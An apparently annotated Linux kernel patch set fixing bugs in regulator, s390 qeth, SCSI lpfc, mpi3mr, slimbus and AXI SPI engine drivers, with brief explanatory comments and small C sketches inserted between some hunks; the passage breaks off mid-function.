+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index c8702011b7613..ff11f37e28c71 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -1916,19 +1916,24 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 		}
+ 	}
+ 
+-	if (err != -EEXIST)
++	if (err != -EEXIST) {
+ 		regulator->debugfs = debugfs_create_dir(supply_name, rdev->debugfs);
+-	if (IS_ERR(regulator->debugfs))
+-		rdev_dbg(rdev, "Failed to create debugfs directory\n");
++		if (IS_ERR(regulator->debugfs)) {
++			rdev_dbg(rdev, "Failed to create debugfs directory\n");
++			regulator->debugfs = NULL;
++		}
++	}
+ 
+-	debugfs_create_u32("uA_load", 0444, regulator->debugfs,
+-			   &regulator->uA_load);
+-	debugfs_create_u32("min_uV", 0444, regulator->debugfs,
+-			   &regulator->voltage[PM_SUSPEND_ON].min_uV);
+-	debugfs_create_u32("max_uV", 0444, regulator->debugfs,
+-			   &regulator->voltage[PM_SUSPEND_ON].max_uV);
+-	debugfs_create_file("constraint_flags", 0444, regulator->debugfs,
+-			    regulator, &constraint_flags_fops);
++	if (regulator->debugfs) {
++		debugfs_create_u32("uA_load", 0444, regulator->debugfs,
++				   &regulator->uA_load);
++		debugfs_create_u32("min_uV", 0444, regulator->debugfs,
++				   &regulator->voltage[PM_SUSPEND_ON].min_uV);
++		debugfs_create_u32("max_uV", 0444, regulator->debugfs,
++				   &regulator->voltage[PM_SUSPEND_ON].max_uV);
++		debugfs_create_file("constraint_flags", 0444, regulator->debugfs,
++				    regulator, &constraint_flags_fops);
++	}
+ 
+ 	/*
+ 	 * Check now if the regulator is an always on regulator - if
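The regulator/core.c hunk above hinges on debugfs_create_dir() reporting failure with an error pointer rather than NULL, so the old code could hand an ERR_PTR to the child debugfs_create_*() calls. A minimal standalone sketch of the guarded pattern, with ERR_PTR()/IS_ERR() re-implemented locally for illustration only (in the kernel they come from <linux/err.h>):

#include <stdio.h>

#define MAX_ERRNO 4095
#define ERR_PTR(err) ((void *)(long)(err))
#define IS_ERR(ptr)  ((unsigned long)(ptr) >= (unsigned long)-MAX_ERRNO)

static void *create_dir(int fail)
{
	/* Like debugfs_create_dir(): returns an error pointer, never NULL. */
	return fail ? ERR_PTR(-12 /* ENOMEM */) : (void *)0x1000;
}

static void create_file(const char *name, void *parent)
{
	/* Stand-in for debugfs_create_u32() and friends. */
	printf("create %s under %p\n", name, parent);
}

int main(void)
{
	void *dir = create_dir(1);

	/* The fix: normalize an error pointer to NULL so the child files
	 * below are skipped instead of being parented to garbage. */
	if (IS_ERR(dir))
		dir = NULL;

	if (dir) {
		create_file("uA_load", dir);
		create_file("min_uV", dir);
	}
	return 0;
}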
+diff --git a/drivers/regulator/mt6360-regulator.c b/drivers/regulator/mt6360-regulator.c
+index 4d34be94d1663..fc464a4450dc5 100644
+--- a/drivers/regulator/mt6360-regulator.c
++++ b/drivers/regulator/mt6360-regulator.c
+@@ -319,15 +319,15 @@ static unsigned int mt6360_regulator_of_map_mode(unsigned int hw_mode)
+ 	}
+ }
+ 
+-#define MT6360_REGULATOR_DESC(_name, _sname, ereg, emask, vreg,	vmask,	\
+-			      mreg, mmask, streg, stmask, vranges,	\
+-			      vcnts, offon_delay, irq_tbls)		\
++#define MT6360_REGULATOR_DESC(match, _name, _sname, ereg, emask, vreg,	\
++			      vmask, mreg, mmask, streg, stmask,	\
++			      vranges, vcnts, offon_delay, irq_tbls)	\
+ {									\
+ 	.desc = {							\
+ 		.name = #_name,						\
+ 		.supply_name = #_sname,					\
+ 		.id =  MT6360_REGULATOR_##_name,			\
+-		.of_match = of_match_ptr(#_name),			\
++		.of_match = of_match_ptr(match),			\
+ 		.regulators_node = of_match_ptr("regulator"),		\
+ 		.of_map_mode = mt6360_regulator_of_map_mode,		\
+ 		.owner = THIS_MODULE,					\
+@@ -351,21 +351,29 @@ static unsigned int mt6360_regulator_of_map_mode(unsigned int hw_mode)
+ }
+ 
+ static const struct mt6360_regulator_desc mt6360_regulator_descs[] =  {
+-	MT6360_REGULATOR_DESC(BUCK1, BUCK1_VIN, 0x117, 0x40, 0x110, 0xff, 0x117, 0x30, 0x117, 0x04,
++	MT6360_REGULATOR_DESC("buck1", BUCK1, BUCK1_VIN,
++			      0x117, 0x40, 0x110, 0xff, 0x117, 0x30, 0x117, 0x04,
+ 			      buck_vout_ranges, 256, 0, buck1_irq_tbls),
+-	MT6360_REGULATOR_DESC(BUCK2, BUCK2_VIN, 0x127, 0x40, 0x120, 0xff, 0x127, 0x30, 0x127, 0x04,
++	MT6360_REGULATOR_DESC("buck2", BUCK2, BUCK2_VIN,
++			      0x127, 0x40, 0x120, 0xff, 0x127, 0x30, 0x127, 0x04,
+ 			      buck_vout_ranges, 256, 0, buck2_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO6, LDO_VIN3, 0x137, 0x40, 0x13B, 0xff, 0x137, 0x30, 0x137, 0x04,
++	MT6360_REGULATOR_DESC("ldo6", LDO6, LDO_VIN3,
++			      0x137, 0x40, 0x13B, 0xff, 0x137, 0x30, 0x137, 0x04,
+ 			      ldo_vout_ranges1, 256, 0, ldo6_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO7, LDO_VIN3, 0x131, 0x40, 0x135, 0xff, 0x131, 0x30, 0x131, 0x04,
++	MT6360_REGULATOR_DESC("ldo7", LDO7, LDO_VIN3,
++			      0x131, 0x40, 0x135, 0xff, 0x131, 0x30, 0x131, 0x04,
+ 			      ldo_vout_ranges1, 256, 0, ldo7_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO1, LDO_VIN1, 0x217, 0x40, 0x21B, 0xff, 0x217, 0x30, 0x217, 0x04,
++	MT6360_REGULATOR_DESC("ldo1", LDO1, LDO_VIN1,
++			      0x217, 0x40, 0x21B, 0xff, 0x217, 0x30, 0x217, 0x04,
+ 			      ldo_vout_ranges2, 256, 0, ldo1_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO2, LDO_VIN1, 0x211, 0x40, 0x215, 0xff, 0x211, 0x30, 0x211, 0x04,
++	MT6360_REGULATOR_DESC("ldo2", LDO2, LDO_VIN1,
++			      0x211, 0x40, 0x215, 0xff, 0x211, 0x30, 0x211, 0x04,
+ 			      ldo_vout_ranges2, 256, 0, ldo2_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO3, LDO_VIN1, 0x205, 0x40, 0x209, 0xff, 0x205, 0x30, 0x205, 0x04,
++	MT6360_REGULATOR_DESC("ldo3", LDO3, LDO_VIN1,
++			      0x205, 0x40, 0x209, 0xff, 0x205, 0x30, 0x205, 0x04,
+ 			      ldo_vout_ranges2, 256, 100, ldo3_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO5, LDO_VIN2, 0x20B, 0x40, 0x20F, 0x7f, 0x20B, 0x30, 0x20B, 0x04,
++	MT6360_REGULATOR_DESC("ldo5", LDO5, LDO_VIN2,
++			      0x20B, 0x40, 0x20F, 0x7f, 0x20B, 0x30, 0x20B, 0x04,
+ 			      ldo_vout_ranges3, 128, 100, ldo5_irq_tbls),
+ };
+ 
+diff --git a/drivers/s390/cio/cio_inject.c b/drivers/s390/cio/cio_inject.c
+index 8613fa937237b..a2e771ebae8eb 100644
+--- a/drivers/s390/cio/cio_inject.c
++++ b/drivers/s390/cio/cio_inject.c
+@@ -95,7 +95,7 @@ static ssize_t crw_inject_write(struct file *file, const char __user *buf,
+ 		return -EINVAL;
+ 	}
+ 
+-	buffer = vmemdup_user(buf, lbuf);
++	buffer = memdup_user_nul(buf, lbuf);
+ 	if (IS_ERR(buffer))
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/s390/net/qeth_core_main.c b/drivers/s390/net/qeth_core_main.c
+index 1e6340e2c2588..f99d1d325f3ea 100644
+--- a/drivers/s390/net/qeth_core_main.c
++++ b/drivers/s390/net/qeth_core_main.c
+@@ -364,30 +364,33 @@ static int qeth_cq_init(struct qeth_card *card)
+ 	return rc;
+ }
+ 
++static void qeth_free_cq(struct qeth_card *card)
++{
++	if (card->qdio.c_q) {
++		qeth_free_qdio_queue(card->qdio.c_q);
++		card->qdio.c_q = NULL;
++	}
++}
++
+ static int qeth_alloc_cq(struct qeth_card *card)
+ {
+ 	if (card->options.cq == QETH_CQ_ENABLED) {
+ 		QETH_CARD_TEXT(card, 2, "cqon");
+-		card->qdio.c_q = qeth_alloc_qdio_queue();
+ 		if (!card->qdio.c_q) {
+-			dev_err(&card->gdev->dev, "Failed to create completion queue\n");
+-			return -ENOMEM;
++			card->qdio.c_q = qeth_alloc_qdio_queue();
++			if (!card->qdio.c_q) {
++				dev_err(&card->gdev->dev,
++					"Failed to create completion queue\n");
++				return -ENOMEM;
++			}
+ 		}
+ 	} else {
+ 		QETH_CARD_TEXT(card, 2, "nocq");
+-		card->qdio.c_q = NULL;
++		qeth_free_cq(card);
+ 	}
+ 	return 0;
+ }
+ 
+-static void qeth_free_cq(struct qeth_card *card)
+-{
+-	if (card->qdio.c_q) {
+-		qeth_free_qdio_queue(card->qdio.c_q);
+-		card->qdio.c_q = NULL;
+-	}
+-}
+-
+ static enum iucv_tx_notify qeth_compute_cq_notification(int sbalf15,
+ 							int delayed)
+ {
+@@ -2628,6 +2631,10 @@ static int qeth_alloc_qdio_queues(struct qeth_card *card)
+ 
+ 	QETH_CARD_TEXT(card, 2, "allcqdbf");
+ 
++	/* completion */
++	if (qeth_alloc_cq(card))
++		goto out_err;
++
+ 	if (atomic_cmpxchg(&card->qdio.state, QETH_QDIO_UNINITIALIZED,
+ 		QETH_QDIO_ALLOCATED) != QETH_QDIO_UNINITIALIZED)
+ 		return 0;
+@@ -2663,10 +2670,6 @@ static int qeth_alloc_qdio_queues(struct qeth_card *card)
+ 		queue->priority = QETH_QIB_PQUE_PRIO_DEFAULT;
+ 	}
+ 
+-	/* completion */
+-	if (qeth_alloc_cq(card))
+-		goto out_freeoutq;
+-
+ 	return 0;
+ 
+ out_freeoutq:
+@@ -2677,6 +2680,8 @@ static int qeth_alloc_qdio_queues(struct qeth_card *card)
+ 	qeth_free_buffer_pool(card);
+ out_buffer_pool:
+ 	atomic_set(&card->qdio.state, QETH_QDIO_UNINITIALIZED);
++	qeth_free_cq(card);
++out_err:
+ 	return -ENOMEM;
+ }
+ 
+@@ -2684,11 +2689,12 @@ static void qeth_free_qdio_queues(struct qeth_card *card)
+ {
+ 	int i, j;
+ 
++	qeth_free_cq(card);
++
+ 	if (atomic_xchg(&card->qdio.state, QETH_QDIO_UNINITIALIZED) ==
+ 		QETH_QDIO_UNINITIALIZED)
+ 		return;
+ 
+-	qeth_free_cq(card);
+ 	for (j = 0; j < QDIO_MAX_BUFFERS_PER_Q; ++j) {
+ 		if (card->qdio.in_q->bufs[j].rx_skb) {
+ 			consume_skb(card->qdio.in_q->bufs[j].rx_skb);
+@@ -3740,24 +3746,11 @@ static void qeth_qdio_poll(struct ccw_device *cdev, unsigned long card_ptr)
+ 
+ int qeth_configure_cq(struct qeth_card *card, enum qeth_cq cq)
+ {
+-	int rc;
+-
+-	if (card->options.cq ==  QETH_CQ_NOTAVAILABLE) {
+-		rc = -1;
+-		goto out;
+-	} else {
+-		if (card->options.cq == cq) {
+-			rc = 0;
+-			goto out;
+-		}
+-
+-		qeth_free_qdio_queues(card);
+-		card->options.cq = cq;
+-		rc = 0;
+-	}
+-out:
+-	return rc;
++	if (card->options.cq == QETH_CQ_NOTAVAILABLE)
++		return -1;
+ 
++	card->options.cq = cq;
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(qeth_configure_cq);
+ 
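The qeth hunks above make qeth_alloc_cq() idempotent and hoist it ahead of the QDIO state check, which is what lets qeth_configure_cq() shrink to a simple option update. A minimal standalone sketch of the idempotent allocate/free pair, with malloc()/free() standing in for qeth_alloc_qdio_queue()/qeth_free_qdio_queue():

#include <stdlib.h>

struct queue { int dummy; };
static struct queue *c_q;	/* stands in for card->qdio.c_q */

static void free_cq(void)
{
	free(c_q);
	c_q = NULL;
}

static int alloc_cq(int cq_enabled)
{
	if (!cq_enabled) {
		free_cq();
		return 0;
	}
	if (!c_q) {		/* already allocated: nothing to do */
		c_q = malloc(sizeof(*c_q));
		if (!c_q)
			return -1;	/* -ENOMEM in the driver */
	}
	return 0;
}

int main(void)
{
	alloc_cq(1);	/* allocates */
	alloc_cq(1);	/* no-op: safe to call again */
	alloc_cq(0);	/* frees */
	return 0;
}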
+diff --git a/drivers/scsi/bnx2fc/bnx2fc_tgt.c b/drivers/scsi/bnx2fc/bnx2fc_tgt.c
+index 2c246e80c1c4d..d91659811eb3c 100644
+--- a/drivers/scsi/bnx2fc/bnx2fc_tgt.c
++++ b/drivers/scsi/bnx2fc/bnx2fc_tgt.c
+@@ -833,7 +833,6 @@ static void bnx2fc_free_session_resc(struct bnx2fc_hba *hba,
+ 
+ 	BNX2FC_TGT_DBG(tgt, "Freeing up session resources\n");
+ 
+-	spin_lock_bh(&tgt->cq_lock);
+ 	ctx_base_ptr = tgt->ctx_base;
+ 	tgt->ctx_base = NULL;
+ 
+@@ -889,7 +888,6 @@ static void bnx2fc_free_session_resc(struct bnx2fc_hba *hba,
+ 				    tgt->sq, tgt->sq_dma);
+ 		tgt->sq = NULL;
+ 	}
+-	spin_unlock_bh(&tgt->cq_lock);
+ 
+ 	if (ctx_base_ptr)
+ 		iounmap(ctx_base_ptr);
+diff --git a/drivers/scsi/lpfc/lpfc.h b/drivers/scsi/lpfc/lpfc.h
+index dc5ac3cc70f6d..6f08fbe103cb9 100644
+--- a/drivers/scsi/lpfc/lpfc.h
++++ b/drivers/scsi/lpfc/lpfc.h
+@@ -1355,7 +1355,6 @@ struct lpfc_hba {
+ 	struct timer_list fabric_block_timer;
+ 	unsigned long bit_flags;
+ 	atomic_t num_rsrc_err;
+-	atomic_t num_cmd_success;
+ 	unsigned long last_rsrc_error_time;
+ 	unsigned long last_ramp_down_time;
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index 6b5ce9869e6b4..05764008f6e70 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -4384,23 +4384,23 @@ lpfc_els_retry_delay(struct timer_list *t)
+ 	unsigned long flags;
+ 	struct lpfc_work_evt  *evtp = &ndlp->els_retry_evt;
+ 
++	/* Hold a node reference for outstanding queued work */
++	if (!lpfc_nlp_get(ndlp))
++		return;
++
+ 	spin_lock_irqsave(&phba->hbalock, flags);
+ 	if (!list_empty(&evtp->evt_listp)) {
+ 		spin_unlock_irqrestore(&phba->hbalock, flags);
++		lpfc_nlp_put(ndlp);
+ 		return;
+ 	}
+ 
+-	/* We need to hold the node by incrementing the reference
+-	 * count until the queued work is done
+-	 */
+-	evtp->evt_arg1  = lpfc_nlp_get(ndlp);
+-	if (evtp->evt_arg1) {
+-		evtp->evt = LPFC_EVT_ELS_RETRY;
+-		list_add_tail(&evtp->evt_listp, &phba->work_list);
+-		lpfc_worker_wake_up(phba);
+-	}
++	evtp->evt_arg1 = ndlp;
++	evtp->evt = LPFC_EVT_ELS_RETRY;
++	list_add_tail(&evtp->evt_listp, &phba->work_list);
+ 	spin_unlock_irqrestore(&phba->hbalock, flags);
+-	return;
++
++	lpfc_worker_wake_up(phba);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_hbadisc.c b/drivers/scsi/lpfc/lpfc_hbadisc.c
+index 549fa7d6c0f6f..aaa98a006fdcb 100644
+--- a/drivers/scsi/lpfc/lpfc_hbadisc.c
++++ b/drivers/scsi/lpfc/lpfc_hbadisc.c
+@@ -241,7 +241,9 @@ lpfc_dev_loss_tmo_callbk(struct fc_rport *rport)
+ 		if (evtp->evt_arg1) {
+ 			evtp->evt = LPFC_EVT_DEV_LOSS;
+ 			list_add_tail(&evtp->evt_listp, &phba->work_list);
++			spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 			lpfc_worker_wake_up(phba);
++			return;
+ 		}
+ 		spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 	} else {
+@@ -259,10 +261,7 @@ lpfc_dev_loss_tmo_callbk(struct fc_rport *rport)
+ 			lpfc_disc_state_machine(vport, ndlp, NULL,
+ 						NLP_EVT_DEVICE_RM);
+ 		}
+-
+ 	}
+-
+-	return;
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_nvme.c b/drivers/scsi/lpfc/lpfc_nvme.c
+index 152245f7cacc7..7e9e0d969256a 100644
+--- a/drivers/scsi/lpfc/lpfc_nvme.c
++++ b/drivers/scsi/lpfc/lpfc_nvme.c
+@@ -2621,9 +2621,9 @@ lpfc_nvme_unregister_port(struct lpfc_vport *vport, struct lpfc_nodelist *ndlp)
+ 		/* No concern about the role change on the nvme remoteport.
+ 		 * The transport will update it.
+ 		 */
+-		spin_lock_irq(&vport->phba->hbalock);
++		spin_lock_irq(&ndlp->lock);
+ 		ndlp->fc4_xpt_flags |= NVME_XPT_UNREG_WAIT;
+-		spin_unlock_irq(&vport->phba->hbalock);
++		spin_unlock_irq(&ndlp->lock);
+ 
+ 		/* Don't let the host nvme transport keep sending keep-alives
+ 		 * on this remoteport. Vport is unloading, no recovery. The
+diff --git a/drivers/scsi/lpfc/lpfc_scsi.c b/drivers/scsi/lpfc/lpfc_scsi.c
+index 0bb7e164b525f..2a81a42de5c14 100644
+--- a/drivers/scsi/lpfc/lpfc_scsi.c
++++ b/drivers/scsi/lpfc/lpfc_scsi.c
+@@ -167,11 +167,10 @@ lpfc_ramp_down_queue_handler(struct lpfc_hba *phba)
+ 	struct Scsi_Host  *shost;
+ 	struct scsi_device *sdev;
+ 	unsigned long new_queue_depth;
+-	unsigned long num_rsrc_err, num_cmd_success;
++	unsigned long num_rsrc_err;
+ 	int i;
+ 
+ 	num_rsrc_err = atomic_read(&phba->num_rsrc_err);
+-	num_cmd_success = atomic_read(&phba->num_cmd_success);
+ 
+ 	/*
+ 	 * The error and success command counters are global per
+@@ -186,20 +185,16 @@ lpfc_ramp_down_queue_handler(struct lpfc_hba *phba)
+ 		for (i = 0; i <= phba->max_vports && vports[i] != NULL; i++) {
+ 			shost = lpfc_shost_from_vport(vports[i]);
+ 			shost_for_each_device(sdev, shost) {
+-				new_queue_depth =
+-					sdev->queue_depth * num_rsrc_err /
+-					(num_rsrc_err + num_cmd_success);
+-				if (!new_queue_depth)
+-					new_queue_depth = sdev->queue_depth - 1;
++				if (num_rsrc_err >= sdev->queue_depth)
++					new_queue_depth = 1;
+ 				else
+ 					new_queue_depth = sdev->queue_depth -
+-								new_queue_depth;
++						num_rsrc_err;
+ 				scsi_change_queue_depth(sdev, new_queue_depth);
+ 			}
+ 		}
+ 	lpfc_destroy_vport_work_array(phba, vports);
+ 	atomic_set(&phba->num_rsrc_err, 0);
+-	atomic_set(&phba->num_cmd_success, 0);
+ }
+ 
+ /**
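The lpfc_scsi.c hunk above replaces the proportional ramp-down (queue depth scaled by num_rsrc_err / (num_rsrc_err + num_cmd_success)) with a direct subtraction clamped at 1, so the depth can no longer reach 0 when errors dominate. A standalone comparison of the two computations (the values are illustrative):

#include <stdio.h>

static unsigned long old_depth(unsigned long depth, unsigned long err,
			       unsigned long ok)
{
	unsigned long d = depth * err / (err + ok);

	if (!d)
		d = depth - 1;
	else
		d = depth - d;
	return d;
}

static unsigned long new_depth(unsigned long depth, unsigned long err)
{
	/* Clamp at 1 rather than underflowing when errors exceed the depth. */
	return err >= depth ? 1 : depth - err;
}

int main(void)
{
	printf("old: %lu  new: %lu\n", old_depth(32, 8, 24), new_depth(32, 8));
	printf("old (err > depth): %lu  new: %lu\n",
	       old_depth(32, 64, 0), new_depth(32, 64));	/* old hits 0 */
	return 0;
}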
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 427a6ac803e50..47b8102a7063a 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -1217,9 +1217,9 @@ lpfc_set_rrq_active(struct lpfc_hba *phba, struct lpfc_nodelist *ndlp,
+ 	empty = list_empty(&phba->active_rrq_list);
+ 	list_add_tail(&rrq->list, &phba->active_rrq_list);
+ 	phba->hba_flag |= HBA_RRQ_ACTIVE;
++	spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 	if (empty)
+ 		lpfc_worker_wake_up(phba);
+-	spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 	return 0;
+ out:
+ 	spin_unlock_irqrestore(&phba->hbalock, iflags);
+@@ -11361,18 +11361,18 @@ lpfc_sli_post_recovery_event(struct lpfc_hba *phba,
+ 	unsigned long iflags;
+ 	struct lpfc_work_evt  *evtp = &ndlp->recovery_evt;
+ 
++	/* Hold a node reference for outstanding queued work */
++	if (!lpfc_nlp_get(ndlp))
++		return;
++
+ 	spin_lock_irqsave(&phba->hbalock, iflags);
+ 	if (!list_empty(&evtp->evt_listp)) {
+ 		spin_unlock_irqrestore(&phba->hbalock, iflags);
++		lpfc_nlp_put(ndlp);
+ 		return;
+ 	}
+ 
+-	/* Incrementing the reference count until the queued work is done. */
+-	evtp->evt_arg1  = lpfc_nlp_get(ndlp);
+-	if (!evtp->evt_arg1) {
+-		spin_unlock_irqrestore(&phba->hbalock, iflags);
+-		return;
+-	}
++	evtp->evt_arg1 = ndlp;
+ 	evtp->evt = LPFC_EVT_RECOVER_PORT;
+ 	list_add_tail(&evtp->evt_listp, &phba->work_list);
+ 	spin_unlock_irqrestore(&phba->hbalock, iflags);
+diff --git a/drivers/scsi/lpfc/lpfc_vport.c b/drivers/scsi/lpfc/lpfc_vport.c
+index 4d171f5c213f7..6b4259894584f 100644
+--- a/drivers/scsi/lpfc/lpfc_vport.c
++++ b/drivers/scsi/lpfc/lpfc_vport.c
+@@ -693,10 +693,6 @@ lpfc_vport_delete(struct fc_vport *fc_vport)
+ 	lpfc_free_sysfs_attr(vport);
+ 	lpfc_debugfs_terminate(vport);
+ 
+-	/* Remove FC host to break driver binding. */
+-	fc_remove_host(shost);
+-	scsi_remove_host(shost);
+-
+ 	/* Send the DA_ID and Fabric LOGO to cleanup Nameserver entries. */
+ 	ndlp = lpfc_findnode_did(vport, Fabric_DID);
+ 	if (!ndlp)
+@@ -740,6 +736,10 @@ lpfc_vport_delete(struct fc_vport *fc_vport)
+ 
+ skip_logo:
+ 
++	/* Remove FC host to break driver binding. */
++	fc_remove_host(shost);
++	scsi_remove_host(shost);
++
+ 	lpfc_cleanup(vport);
+ 
+ 	/* Remove scsi host now.  The nodes are cleaned up. */
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index 8c662d08706f1..42600e5c457a1 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -1344,7 +1344,7 @@ static long mpi3mr_bsg_process_mpt_cmds(struct bsg_job *job, unsigned int *reply
+ 	if ((mpirep_offset != 0xFF) &&
+ 	    drv_bufs[mpirep_offset].bsg_buf_len) {
+ 		drv_buf_iter = &drv_bufs[mpirep_offset];
+-		drv_buf_iter->kern_buf_len = (sizeof(*bsg_reply_buf) - 1 +
++		drv_buf_iter->kern_buf_len = (sizeof(*bsg_reply_buf) +
+ 					   mrioc->reply_sz);
+ 		bsg_reply_buf = kzalloc(drv_buf_iter->kern_buf_len, GFP_KERNEL);
+ 
+diff --git a/drivers/slimbus/qcom-ngd-ctrl.c b/drivers/slimbus/qcom-ngd-ctrl.c
+index 76c5e446d2433..da8555f3b6ca5 100644
+--- a/drivers/slimbus/qcom-ngd-ctrl.c
++++ b/drivers/slimbus/qcom-ngd-ctrl.c
+@@ -1376,7 +1376,11 @@ static void qcom_slim_ngd_up_worker(struct work_struct *work)
+ 	ctrl = container_of(work, struct qcom_slim_ngd_ctrl, ngd_up_work);
+ 
+ 	/* Make sure qmi service is up before continuing */
+-	wait_for_completion_interruptible(&ctrl->qmi_up);
++	if (!wait_for_completion_interruptible_timeout(&ctrl->qmi_up,
++						       msecs_to_jiffies(MSEC_PER_SEC))) {
++		dev_err(ctrl->dev, "QMI wait timeout\n");
++		return;
++	}
+ 
+ 	mutex_lock(&ctrl->ssr_lock);
+ 	qcom_slim_ngd_enable(ctrl, true);
+diff --git a/drivers/spi/spi-axi-spi-engine.c b/drivers/spi/spi-axi-spi-engine.c
+index 80c3e38f5c1b5..a5f0a61b266f1 100644
+--- a/drivers/spi/spi-axi-spi-engine.c
++++ b/drivers/spi/spi-axi-spi-engine.c
+@@ -6,6 +6,8 @@
+  */
+ 
+ #include <linux/clk.h>
++#include <linux/fpga/adi-axi-common.h>
++#include <linux/idr.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/of.h>
+@@ -13,12 +15,6 @@
+ #include <linux/platform_device.h>
+ #include <linux/spi/spi.h>
+ 
+-#define SPI_ENGINE_VERSION_MAJOR(x)	((x >> 16) & 0xff)
+-#define SPI_ENGINE_VERSION_MINOR(x)	((x >> 8) & 0xff)
+-#define SPI_ENGINE_VERSION_PATCH(x)	(x & 0xff)
+-
+-#define SPI_ENGINE_REG_VERSION			0x00
+-
+ #define SPI_ENGINE_REG_RESET			0x40
+ 
+ #define SPI_ENGINE_REG_INT_ENABLE		0x80
+@@ -78,28 +74,42 @@ struct spi_engine_program {
+ 	uint16_t instructions[];
+ };
+ 
+-struct spi_engine {
+-	struct clk *clk;
+-	struct clk *ref_clk;
+-
+-	spinlock_t lock;
+-
+-	void __iomem *base;
+-
+-	struct spi_message *msg;
++/**
++ * struct spi_engine_message_state - SPI engine per-message state
++ */
++struct spi_engine_message_state {
++	/** Instructions for executing this message. */
+ 	struct spi_engine_program *p;
++	/** Number of elements in cmd_buf array. */
+ 	unsigned cmd_length;
++	/** Array of commands not yet written to CMD FIFO. */
+ 	const uint16_t *cmd_buf;
+-
++	/** Next xfer with tx_buf not yet fully written to TX FIFO. */
+ 	struct spi_transfer *tx_xfer;
++	/** Size of tx_buf in bytes. */
+ 	unsigned int tx_length;
++	/** Bytes not yet written to TX FIFO. */
+ 	const uint8_t *tx_buf;
+-
++	/** Next xfer with rx_buf not yet fully filled from the RX FIFO. */
+ 	struct spi_transfer *rx_xfer;
++	/** Size of rx_buf in bytes. */
+ 	unsigned int rx_length;
++	/** Bytes not yet read from the RX FIFO. */
+ 	uint8_t *rx_buf;
++	/** ID to correlate SYNC interrupts with this message. */
++	u8 sync_id;
++};
++
++struct spi_engine {
++	struct clk *clk;
++	struct clk *ref_clk;
++
++	spinlock_t lock;
+ 
+-	unsigned int sync_id;
++	void __iomem *base;
++
++	struct spi_message *msg;
++	struct ida sync_ida;
+ 	unsigned int completed_id;
+ 
+ 	unsigned int int_enable;
+@@ -258,106 +268,111 @@ static void spi_engine_xfer_next(struct spi_engine *spi_engine,
+ 
+ static void spi_engine_tx_next(struct spi_engine *spi_engine)
+ {
+-	struct spi_transfer *xfer = spi_engine->tx_xfer;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
++	struct spi_transfer *xfer = st->tx_xfer;
+ 
+ 	do {
+ 		spi_engine_xfer_next(spi_engine, &xfer);
+ 	} while (xfer && !xfer->tx_buf);
+ 
+-	spi_engine->tx_xfer = xfer;
++	st->tx_xfer = xfer;
+ 	if (xfer) {
+-		spi_engine->tx_length = xfer->len;
+-		spi_engine->tx_buf = xfer->tx_buf;
++		st->tx_length = xfer->len;
++		st->tx_buf = xfer->tx_buf;
+ 	} else {
+-		spi_engine->tx_buf = NULL;
++		st->tx_buf = NULL;
+ 	}
+ }
+ 
+ static void spi_engine_rx_next(struct spi_engine *spi_engine)
+ {
+-	struct spi_transfer *xfer = spi_engine->rx_xfer;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
++	struct spi_transfer *xfer = st->rx_xfer;
+ 
+ 	do {
+ 		spi_engine_xfer_next(spi_engine, &xfer);
+ 	} while (xfer && !xfer->rx_buf);
+ 
+-	spi_engine->rx_xfer = xfer;
++	st->rx_xfer = xfer;
+ 	if (xfer) {
+-		spi_engine->rx_length = xfer->len;
+-		spi_engine->rx_buf = xfer->rx_buf;
++		st->rx_length = xfer->len;
++		st->rx_buf = xfer->rx_buf;
+ 	} else {
+-		spi_engine->rx_buf = NULL;
++		st->rx_buf = NULL;
+ 	}
+ }
+ 
+ static bool spi_engine_write_cmd_fifo(struct spi_engine *spi_engine)
+ {
+ 	void __iomem *addr = spi_engine->base + SPI_ENGINE_REG_CMD_FIFO;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
+ 	unsigned int n, m, i;
+ 	const uint16_t *buf;
+ 
+ 	n = readl_relaxed(spi_engine->base + SPI_ENGINE_REG_CMD_FIFO_ROOM);
+-	while (n && spi_engine->cmd_length) {
+-		m = min(n, spi_engine->cmd_length);
+-		buf = spi_engine->cmd_buf;
++	while (n && st->cmd_length) {
++		m = min(n, st->cmd_length);
++		buf = st->cmd_buf;
+ 		for (i = 0; i < m; i++)
+ 			writel_relaxed(buf[i], addr);
+-		spi_engine->cmd_buf += m;
+-		spi_engine->cmd_length -= m;
++		st->cmd_buf += m;
++		st->cmd_length -= m;
+ 		n -= m;
+ 	}
+ 
+-	return spi_engine->cmd_length != 0;
++	return st->cmd_length != 0;
+ }
+ 
+ static bool spi_engine_write_tx_fifo(struct spi_engine *spi_engine)
+ {
+ 	void __iomem *addr = spi_engine->base + SPI_ENGINE_REG_SDO_DATA_FIFO;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
+ 	unsigned int n, m, i;
+ 	const uint8_t *buf;
